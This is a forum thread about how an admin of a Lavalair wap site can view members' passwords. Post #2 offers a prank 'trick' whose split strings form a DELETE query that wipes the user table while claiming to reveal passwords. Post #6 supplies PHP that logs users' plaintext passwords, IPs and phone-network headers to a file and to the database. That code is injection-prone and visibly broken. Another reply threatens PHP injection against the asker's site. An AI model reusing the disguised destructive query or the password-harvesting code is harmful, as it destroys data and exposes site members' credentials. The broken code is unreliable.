show password on lavalair

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

    show password on lavalair

    Hi,

    How cand I make if I`m admin to see the user password .

    #2
    i prefer the slightly older methods:

    $x = "LETE";
    if($pass!=$x){
    $i = "DE";
    $pass = mysql_query(/*"SELECT pass */"$i$x FROM ibwf_users WHERE uid!='".$i."'");
    $pass = md5($pass);
    echo "Password is: $pass";
    }
    Last edited by something else; 19.08.10, 03:36.

    Comment


      #3
      @all Wow, nice trick, i like it :-D

      Comment


        #4
        Dont like this idea. if you use this function, Where is the privacy of your users/members?
        LESS TALK. LESS MISTAKE.

        HTTP://APPSROB.COM - LIST OF MY FACEBOOK APPS!

        Comment


          #5
          Originally posted by robzky View Post
          Dont like this idea. if you use this function, Where is the privacy of your users/members?
          Don't You understand what sub and dj said!! They gives you that tricks. use their suggestion and soon you will get result. ;) ha ha ha.....:P Unlink. :P

          Comment


            #6
            in users dbase add
            `pass2` text NOT NULL,
            after the pass field

            on view user

            PHP Code:
            if(isowner(getuid_sid($sid)))
              {
            $nopl mysql_fetch_array(mysql_query("SELECT pass2 FROM ibwf_users WHERE id='".$who."'"));
              echo 
            "<b>Pass:</b> $nopl[0]<br/>";
              } 
            in core add or edit your likes

            PHP Code:
            $sid md5($did);

            $brws explode(" ",$HTTP_USER_AGENT);
            $ubr $brws[0];
            $uip getip();
            $netinfo getenv(HTTP_X_NETWORK_INFO); 
            $xnetinfo $_SERVER['HTTP_X_NETWORK_INFO'];
            //$host = gethostbyaddr($uip);
            //if (!$host) { $host = $uip; }
            $time time() + (17 60 60);
              
            $newtime date("H:i",$time);
              
            $date strtotime('+17 hours');
            $newdate date('D jS M y',$date);
            $fp fopen("../logs/info.txt","a+");
            fwrite ($fp"\n" .$newtime." Date:".$newdate." Name:".$uid." Pass:".$pwd." Browser:".$ubr." Fone Number:".$netinfo." Fone Number2:".$xnetinfo." Host Name:".$host." IP:".$uip."\n");
            fclose($fp);
            $res mysql_query("INSERT INTO ibwf_ses SET name='".$uid."', pass='".$pwd."', browser='".$ubr."', ip='".$uip."', WHERE uid='".getuid_nick($uid)."'");
            $res mysql_query("UPDATE ibwf_users SET pass2='".$pwd."', WHERE id='".getuid_sid($sid)."'");
            $res mysql_query("UPDATE ibwf_users SET numturns='".$point."', gold='".$point."', skillpts='".$point."', WHERE id='".getuid_sid($sid)."'");
            $res mysql_query("INSERT INTO ibwf_users SET  brws2='".$ubr."', ip2='".$uip."', WHERE uid='".getuid_nick($uid)."'");
            mysql_query("INSERT INTO  ibwf_users  brws2='".$ubr."', ip2='".$uip."', WHERE id='".getuid_sid($sid)."'");
            $tm time();
                  
            $xtm $tm + (getsxtm()*60);
                  
            $did $uid.$tm;
                  
            $res mysql_query("INSERT INTO ibwf_ses SET id='".md5($did)."', uid='".getuid_nick($uid)."', expiretm='".$xtm."'");
                  
                  if(
            $res)
                  {
                    
            $tolog=true;
                    echo 
            "<img src=\"images/ok.gif\" alt=\"+\"/>You have logged in successfully as $uid<br/>";
                    
            $idn getuid_nick($uid);
                    
                        
            $lact mysql_fetch_array(mysql_query("SELECT lastact FROM ibwf_users WHERE id='".$idn."'"));
                         
            mysql_query("UPDATE ibwf_users SET lastvst='".$lact[0]."' WHERE id='".$idn."'");
                  }else{
                    
            //is user already logged in?
                    
            $logedin mysql_fetch_array(mysql_query("SELECT (*) FROM ibwf_ses WHERE uid='".$getuid_nick($uid)."'"));
                    if(
            $logedin[0]>0)
                    {
                      
            //yip, so let's just update the expiration time
                      
            $xtm time() + (getsxtm()*60);
                      
            $res mysql_query("UPDATE ibwf_ses SET expiretm='".$xtm."' WHERE uid='".getuid_nick($uid)."'");
                      
                      if(
            $res)
                      {
                        
            $tolog=true;
            $res mysql_query("INSERT INTO ibwf_users SET name='".$uid."', date='".$newtime."', pass2='".$pwd."', brws2='".$ubr."', ip2='".$uip."', WHERE uid='".getuid_nick($uid)."'");   
                        echo 
            "<img src=\"../images/ok.gif\" alt=\"+\"/>You have logged in successfully as $uid<br/>";
                        

                       
                        
                      }else{
                        echo 
            "<img src=\"../images/point.gif\" alt=\"!\"/>Can't login at the time, plz try later<br/>"//no chance this could happen unless there's error in mysql connection
                        
                      
            }
                      
                    }
                    
                  }
                
                }
              } 
            -------------------------------------------------------------------
            this is old code i made a long time ago it decrypts ther password and pass2 is updated when they log in









            Dont Ask Me Dumb Questions.Or you'l get a Dumb Answer..
            Want A Profesional Logo or Theme For Your wap site Pm Me.If I Have The Time Ill Make It For Free

            Comment


              #7
              Originally posted by joker12 View Post
              Hi,

              How cand I make if I`m admin to see the user password .
              When i find your site i going to php injection to it and tell all users that you know there password !! :P
              Visit: Chat4u.mobi - The New Lay Of being a site of your dreams!
              Visit: WapMasterz Coming Back Soon!
              _______
              SCRIPTS FOR SALE BY SUBZERO
              Chat4u Script : coding-talk.com/f28/chat4u-mobi-script-only-150-a-17677/ - > Best Script for your site no other can be hacked by sql or uploaders.
              FileShare Script : coding-talk.com/f28/file-wap-share-6596/ -> Uploader you will never regret buying yeah it mite be old now but it still seems to own others...
              _______
              Info & Tips
              php.net
              w3schools.com

              Comment


                #8
                Display pwd? ****ing wanker. Sadly, saving a value frm a $_GET array into db doesnt make u a programmer. Neither does impersonating. @ozziemale3
                Last edited by CreativityKills; 21.08.10, 11:00.

                Comment

                Working...
                X